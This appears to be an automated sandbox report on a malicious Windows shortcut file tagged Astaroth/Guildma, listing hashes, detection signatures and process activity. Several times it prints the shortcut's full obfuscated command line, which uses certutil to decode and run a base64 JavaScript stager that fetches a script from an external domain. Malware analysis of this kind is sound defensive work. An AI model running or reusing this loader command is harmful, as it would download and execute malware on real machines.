Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WNKpB6SXkg.lnk

Overview

General Information

Sample Name:WNKpB6SXkg.lnk
Analysis ID:794218
MD5:dde2cf4cb9b483e8eb8a2d851deac816
SHA1:2cb939abfa8fec5622662eb8cf0baa1544e0569f
SHA256:76ee775c99099f8f68656e8a9eacf657720add7110ba7f72e65cc538f595be4e
Tags:AstarothBRAgeoGuildmalnk

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Windows shortcut file (LNK) starts blacklisted processes
Obfuscated command line found
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Program does not show much activity (idle)

Classification

  • System is w10x64
  • cmd.exe (PID: 5196 cmdline: C:\Windows\system32\cmd.exe /V/D/c md C: 58H8S5\>nul 2>&1 &&s^eT RYED=C: 58H8S5\^E58H8S5.^jS&&echo dmFyIEM5ZWc9InNjIisiciI7RDllZz0iaXAiKyJ0OmgiO0U5ZWc9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDOWVnK0Q5ZWcrRTllZysiLy9lY2VpZTYuc2FvYnJhc3R1cmJpbGhhb2Nvc21lLmNvbS8/MS8iKTs=>!RYED!&&cErtUtil -f -dEco^de !RYED! !RYED!&&ca^ll !RYED! MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results
Source: classification engineClassification label: mal52.winLNK@1/1@0/0

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C: 58H8S5\>nul 2>&1 &&s^eT RYED=C: 58H8S5\^E58H8S5.^jS&&echo dmFyIEM5ZWc9InNjIisiciI7RDllZz0iaXAiKyJ0OmgiO0U5ZWc9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDOWVnK0Q5ZWcrRTllZysiLy9lY2VpZTYuc2FvYnJhc3R1cmJpbGhhb2Nvc21lLmNvbS8/MS8iKTs=>!RYED!&&cErtUtil -f -dEco^de !RYED! !RYED!&&ca^ll !RYED!

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: unknownProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c: 58h8s5\>nul 2>&1 &&s^et ryed=c: 58h8s5\^e58h8s5.^js&&echo dmfyiem5zwc9innjiisicii7rdllzz0iaxaikyj0omgio0u5zwc9ilqikyj0ucirijoio0dlde9iamvjdchdowvnk0q5zwcrrtllzysily9ly2vpztyuc2fvynjhc3r1cmjpbghhb2nvc21llmnvbs8/ms8ikts=>!ryed!&&certutil -f -deco^de !ryed! !ryed!&&ca^ll !ryed!
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts11
Command and Scripting Interpreter
Path InterceptionPath Interception1
Deobfuscate/Decode Files or Information
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:794218
Start date and time:2023-01-30 11:27:09 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 2m 19s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:2
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample file name:WNKpB6SXkg.lnk
Detection:MAL
Classification:mal52.winLNK@1/1@0/0
Cookbook Comments:
  • Found application associated with file extension: .lnk
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): conhost.exe
  • Not all processes where analyzed, report is missing behavior information
No simulations
No context
No context
No context
No context
No context
Process:C:\Windows\System32\cmd.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):68
Entropy (8bit):4.257997723692869
Encrypted:false
SSDEEP:3:SMLL6QGHdpK1gi6HY:fRGHzK1/6HY
MD5:75FC1E88767A57080C0EA1E86F00C243
SHA1:70953D42A0723F3CFB0684C4FC71988BC5C35D2F
SHA-256:B243E3431CF3FD2DA74278615CAA676AD4F4F806E23B19FCD398E83A7B02390D
SHA-512:00EC8E87FBF3F1C42228F95954A066E3BED4B86406F31564C3BC386A8EBA4A41E2E0EC8837010A8CD8DF606B938A33A9A797C4EC7D9ACF7C34FABB837CC7BFC6
Malicious:false
Reputation:low
Preview:The filename, directory name, or volume label syntax is incorrect...
File type:MS Windows shortcut, Item id list present, Has Working directory, Has command line arguments, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
Entropy (8bit):5.493665403087596
TrID:
  • Windows Shortcut (20020/1) 100.00%
File name:WNKpB6SXkg.lnk
File size:495
MD5:dde2cf4cb9b483e8eb8a2d851deac816
SHA1:2cb939abfa8fec5622662eb8cf0baa1544e0569f
SHA256:76ee775c99099f8f68656e8a9eacf657720add7110ba7f72e65cc538f595be4e
SHA512:77b0e0a33bb00d021aed16fa0348fa8ed8e984fc913a91a629dee15bd74c78e696bb78c26a1c964bb61d62f2e1bdd87dc3f8596dcaf029d48db3b0be40014506
SSDEEP:12:8rflM8OBE6ZGfgKer0fmjdiuML4OmoRm79VNYzPoJKpu68K:8loGf/er0fmBML4Ojm7azPYn63
TLSH:E7F0AB4EE1327DE2C10C65376E061F6C586E394B8FA82562EACF0FC810559C42F0D894
File Content Preview:L..................F1... ...................................................]....P.O. .:i.....+00.../C:\......................+.2...........wINdOws\sYSteM32\conHost.EXe.....C:\wINdOws\sYSteM32-.%ComSpec% /V/D/c "md C:.58H8S5\>nul 2>&1 &&s^eT RYED=C:.58H8S
Icon Hash:00828e868e89bd0d

General

Relative Path:
Command Line Argument:%ComSpec% /V/D/c "md C:58H8S5\>nul 2>&1 &&s^eT RYED=C:58H8S5\^E58H8S5.^jS&&echo dmFyIEM5ZWc9InNjIisiciI7RDllZz0iaXAiKyJ0OmgiO0U5ZWc9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDOWVnK0Q5ZWcrRTllZysiLy9lY2VpZTYuc2FvYnJhc3R1cmJpbGhhb2Nvc21lLmNvbS8/MS8iKTs=>!RYED!&&cErtUtil -f -dEco^de !RYED! !RYED!&&ca^ll !RYED!"
Icon location:
Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

Click to jump to process

Click to jump to process

Target ID:1
Start time:11:28:03
Start date:30/01/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /V/D/c md C: 58H8S5\>nul 2>&1 &&s^eT RYED=C: 58H8S5\^E58H8S5.^jS&&echo dmFyIEM5ZWc9InNjIisiciI7RDllZz0iaXAiKyJ0OmgiO0U5ZWc9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDOWVnK0Q5ZWcrRTllZysiLy9lY2VpZTYuc2FvYnJhc3R1cmJpbGhhb2Nvc21lLmNvbS8/MS8iKTs=>!RYED!&&cErtUtil -f -dEco^de !RYED! !RYED!&&ca^ll !RYED!
Imagebase:0x7ff627730000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

No disassembly